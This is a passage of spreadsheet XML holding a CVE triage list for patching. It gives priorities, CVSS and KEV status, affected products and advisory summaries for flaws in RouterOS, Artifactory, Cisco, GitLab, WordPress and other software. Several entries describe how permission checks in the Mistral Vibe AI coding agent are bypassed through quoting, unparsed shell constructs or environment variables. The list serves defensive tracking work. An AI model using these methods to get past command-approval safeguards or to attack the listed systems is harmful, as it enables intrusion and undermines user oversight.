        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>RouterOS accepts a "related" btest connection before the corresponding primary session has completed authentication. An unauthenticated client can use this state to start an IPv4 UDP test. With "random-data=false", the sender transmits an uninitialized tail from a kernel packet buffer. A separate unchecked, inverted packet-size interval causes unsigned integer underflow, anomalously large fragmented output, and can restart the RouterOS kernel.
This issue was fixed in versions: 6.49.21 (Long-term), 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42016</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr"/>
      <c r="E5" s="5" t="inlineStr"/>
      <c r="F5" s="5" t="inlineStr"/>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H5" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr"/>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an incorrect authorization vulnerability that leads to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42018</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr"/>
      <c r="E6" s="5" t="inlineStr"/>
      <c r="F6" s="5" t="inlineStr"/>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H6" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>none</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an improper authentication vulnerability that could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42018</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr"/>
      <c r="F7" s="5" t="inlineStr"/>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr"/>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7"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S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr"/>
      <c r="F8" s="5" t="inlineStr"/>
      <c r="G8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H8" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr"/>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84869</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H9" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>connectwise:screenconnect</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>ConnectWise ScreenConnect contains both an improper privilege management and missing authorization vulnerability that may allow an attacker to transfer and execute files through an active remote session without authorization or host confirmation.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr"/>
      <c r="F10" s="5" t="inlineStr"/>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H10" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10"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S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87886</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr"/>
      <c r="F11" s="5" t="inlineStr"/>
      <c r="G11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>KEV</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr"/>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S11"/>
  <conditionalFormatting sqref="E2:E1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1">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Newly scored</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>RouterOS contains an argument-handling flaw in the SSH login
path involving usernames that begin with a prohibited character, allowing for the trusted RouterOS policy mask to be changed, leading to privilege escalation. Exploitation requires an unauthenticated SSH session to reach the RouterOS login helper.This issue was fixed in versions: 6.49.21 (Long-term), 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>RouterOS accepts a "related" btest connection before the corresponding primary session has completed authentication. An unauthenticated client can use this state to start an IPv4 UDP test. With "random-data=false", the sender transmits an uninitialized tail from a kernel packet buffer. A separate unchecked, inverted packet-size interval causes unsigned integer underflow, anomalously large fragmented output, and can restart the RouterOS kernel.
This issue was fixed in versions: 6.49.21 (Long-term), 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14560</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>The teddy-bear-customize-addon WordPress plugin through 1.0.5 does not properly validate uploaded files, relying on a client-supplied content type and preserving the original filename, allowing unauthenticated attackers to upload arbitrary PHP files and execute code on the server.</t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14560</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80462</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>security@progress.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Chef Automate API gateway and identity validation path may allow an unauthenticated actor to gain elevated access to protected Chef Automate functionality under specific conditions.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80462</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82004</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>adobe:campaign</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>Adobe Campaign Classic (ACC) is affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82004</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87985</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>An arbitrary code execution vulnerability in Mistral Vibe allows an attacker to bypass command permission checks using ANSI-C quoted arguments. These arguments are not properly inspected, enabling a crafted allowlisted command to execute arbitrary code on the user's system without approval.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87985</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87986</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>CWE-228</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>An arbitrary code execution vulnerability in Mistral Vibe allows an attacker to bypass command permission checks using shell constructs it's parser cannot interpret. Unparsed portions are omitted from inspection, enabling embedded commands to execute on the user's system without approval.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87986</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87987</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>CWE-15</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>An arbitrary code execution vulnerability in Mistral Vibe allows an attacker to bypass command permission checks using environment variable assignments preceding allowlisted commands. These assignments are excluded from inspection, enabling attacker-controlled environment variables to cause arbitrary code execution without user approval.</t>
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87987</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87988</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
